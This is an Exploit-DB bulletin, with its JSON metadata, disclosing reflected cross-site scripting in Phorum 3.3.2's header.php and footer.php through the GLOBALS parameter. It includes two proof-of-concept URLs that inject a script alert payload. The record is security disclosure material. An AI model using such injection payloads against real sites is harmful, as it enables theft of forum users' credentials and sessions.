ID EDB-ID:21461 Type exploitdb Reporter markus arndt Modified 2002-05-18T00:00:00
Description
Phorum 3.3.2 Cross Site Scripting Vulnerabilities. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/4767/info
Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.
The 'header.php' and 'footer.php' components of Phorum do not santize the client-supplied value of the 'GLOBALS' parameter prior to output. As a result, script commands embedded in these variables will be executed by the client in the context of Phorum.
Attackers may exploit this vulnerability to obtain user credentials.
http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>
{"id": "EDB-ID:21461", "hash": "2eeda02c58a6339da64ee4e382c6c6cf", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Phorum 3.3.2 - Cross-Site Scripting Vulnerabilities", "description": "Phorum 3.3.2 Cross Site Scripting Vulnerabilities. Webapps exploit for php platform", "published": "2002-05-18T00:00:00", "modified": "2002-05-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/21461/", "reporter": "markus arndt", "references": [], "cvelist": [], "lastseen": "2016-02-02T16:31:36", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-02-02T16:31:36"}, "vulnersScore": 4.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/21461/", "sourceData": "source: http://www.securityfocus.com/bid/4767/info\r\n\r\nPhorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.\r\n\r\nThe 'header.php' and 'footer.php' components of Phorum do not santize the client-supplied value of the 'GLOBALS' parameter prior to output. As a result, script commands embedded in these variables will be executed by the client in the context of Phorum.\r\n\r\nAttackers may exploit this vulnerability to obtain user credentials.\r\n\r\nhttp://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert(\"css strikes!\");</script>\r\n\r\nhttp://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert(\"css strikes!\");</script> ", "osvdbidlist": ["11144", "11145"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}